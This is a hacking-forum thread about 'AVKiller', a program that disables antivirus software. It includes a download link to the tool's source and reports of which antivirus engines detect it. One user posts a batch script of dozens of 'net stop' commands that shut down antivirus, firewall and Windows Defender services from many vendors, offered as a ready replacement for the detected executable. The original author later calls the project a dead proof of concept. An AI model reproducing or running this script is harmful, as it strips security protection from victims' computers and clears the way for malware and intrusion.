AntiVirus killer

[spektormax]

yeh the spektormax payload check the USB Hack section

[jacobmervine]

thanks, thats alot of other stuff to :)

[Nayru]

source code.... :roll:

[remkow]

The link can be found on the wiki..

but here it is:

http://www.freewebs.com/5kah/AVKillSrc.rar

[twist3r]

bitdefender 9 (second to newest version) detects avkiller as Generic.Malware.O!Ok!.56D47C5D

AntiVir 7.3.0.21 detects it as TR/AVkiller.AN

Panda 9.0.0.4 detects it as Trj/AVkiller.AN

anyone tried recently with norton or mcafee? those were the only two I didn't check with

[moonlit]

Woot! An app I made is detected by antivirus software. My work here is done, goodbye and goodnight!

I'm kidding. It's probably way too old to be useful already, you could try editing some of the code/packing it or whatever but meh, it's only a PoC anyways, it's there for you to do what you will with.

[twist3r]

what antivirus software was this designed to shutdown? It doesn't seem to affect bitdefender, so I'm curious exactly which AVs this was designed against

[moonlit]

Can't remember now, the info should be on the wiki, it's for AVG, NOD32, Avast (I think) and maybe one or two others, I didn't bother finishing it, I just left it for people to improve on... the basic framework is there...

[dred]

i just made a bat file you can run without exe soemavs picked up kill.exe just run the bat file you can add to it. as the forum doesnt allow more then 10000 charaters in a post ill post partial..

echo. >> sc.txt
net stop NOD32 Kernel Service /y >> sc.txt
net stop "Network Associates McShield" /y >> sc.txt
net stop "Mcshield" /y >> sc.txt
net stop "McAfee Personal Firewall Service" /y >> sc.txt
net stop "Symantec AntiVirus Client" /y >> sc.txt
net stop "Norton AntiVirus Auto Protect Service" /y >> sc.txt
net stop "Microsoft firewall" /y >> sc.txt
net stop "Intel Alert Handler" /y >> sc.txt
net stop "Intel Alert Originator" /y >> sc.txt
net stop "Intel File Transfer" /y >> sc.txt
net stop "Intel PDS" /y >> sc.txt
net stop "SAVRoam" /y >> sc.txt
net stop "Symantec AntiVirus Definition Watcher" /y >> sc.txt
net stop "Symantec AntiVirus Definition" /y >> sc.txt
net stop "Symantec Event Manager" /y >> sc.txt
net stop "Symantec Network Drivers Service" /y >> sc.txt
net stop "Symantec Password Validation" /y >> sc.txt
net stop "Symantec SecurePort" /y >> sc.txt
net stop "Symantec Settings Manager" /y >> sc.txt
net stop "Symantec AntiVirus" /y >> sc.txt
net stop "Symantec Core LC" /y >> sc.txt
net stop "SNDSrvc" /y >> sc.txt
net stop "Symantec Network Drivers Servi" /y >> sc.txt
net stop "Symantec Network Drivers Service" /y >> sc.txt
net stop "SAVScan" /y >> sc.txt
net stop "Symantec AVScan" /y >> sc.txt
net stop "Norton AntiVirus Auto-Protect" /y >> sc.txt
net stop "NPFMntor" /y >> sc.txt
net stop "Norton AntiVirus Firewall Moni" /y >> sc.txt
net stop "Norton AntiVirus Firewall Monitor" /y >> sc.txt
net stop "NSCService" /y >> sc.txt
net stop "Norton Protection Center Servi" /y >> sc.txt
net stop "Norton Protection Center Service" /y >> sc.txt
net stop "ccSetMgr" /y >> sc.txt
net stop "ccEvtMgr" /y >> sc.txt
net stop "ccPwdSvc" /y >> sc.txt
net stop "SENS" /y >> sc.txt
net stop "SPBBCSvc" /y >> sc.txt
net stop "kavsvc" /y >> sc.txt
net stop "Kaspersky Antivirus" /y >> sc.txt
net stop "Kaspersky Antivirus TM" /y >> sc.txt
net stop "AVG anti-virus" /y >> sc.txt
net stop "McAfee virus scan" /y >> sc.txt
net stop "Norton AntiVirus" /y >> sc.txt
net stop "ZoneAlarm Firewall" /y >> sc.txt
net stop "AVG Antivirus" /y >> sc.txt
net stop "AdminServer" /y >> sc.txt
net stop "PavSrv" /y >> sc.txt
net stop "PavReport" /y >> sc.txt
net stop "PavPrSrv" /y >> sc.txt
net stop "PAvDCExc" /y >> sc.txt
net stop "PavAtScheduler" /y >> sc.txt
net stop "PAVAGENTE" /y >> sc.txt
net stop "Panda Software Controller" /y >> sc.txt
net stop "PadFSvr" /y >> sc.txt
net stop "PsImSvc" /y >> sc.txt
net stop "Sophos Agent" /y >> sc.txt
net stop "Sophos Message Router" /y >> sc.txt
net stop "SAVService" /y >> sc.txt
net stop "Sophos Anti-Virus" /y >> sc.txt
net stop "SAVAdminService" /y >> sc.txt
net stop "Sophos Anti-Virus status repor" /y >> sc.txt
net stop "Sophos Anti-Virus status report" /y >> sc.txt
net stop "Sophos AutoUpdate Service" /y >> sc.txt
net stop "MDaemon" /y >> sc.txt
net stop "avast!" /y >> sc.txt
net stop "avast! System Guard" /y >> sc.txt
net stop "avast" /y >> sc.txt
net stop "WinDefend" /y >> sc.txt
net stop "Windows Defender Service" /y >> sc.txt
net stop "AvgServ" /y >> sc.txt
net stop "AVG6 Service" /y >> sc.txt
net stop "Avg7Alrt" /y >> sc.txt
net stop "Avg7UpdSvc" /y >> sc.txt
echo. >> sc.txt
echo. >> sc.txt
cls

[nicatronTg]

May I ask why the wiki page is gone missing?

[moonlit]

May I ask why the wiki page is gone missing?

If you're referring to the wiki page on which the original AVKill was distributed, this "project" is long, long dead and I'd like it to stay that way. I no longer have the binary or source for the program and if I did I wouldn't be distributing it. It was just another antivirus killer, much like any other, and was only meant to show that it was easy to do and it was not meant to be used in the real world.

[nicatronTg]

May I ask why the wiki page is gone missing?

If you're referring to the wiki page on which the original AVKill was distributed, this "project" is long, long dead and I'd like it to stay that way. I no longer have the binary or source for the program and if I did I wouldn't be distributing it. It was just another antivirus killer, much like any other, and was only meant to show that it was easy to do and it was not meant to be used in the real world.

Thank-you for the clarification, moonlit. I was just wondering about that, that is all.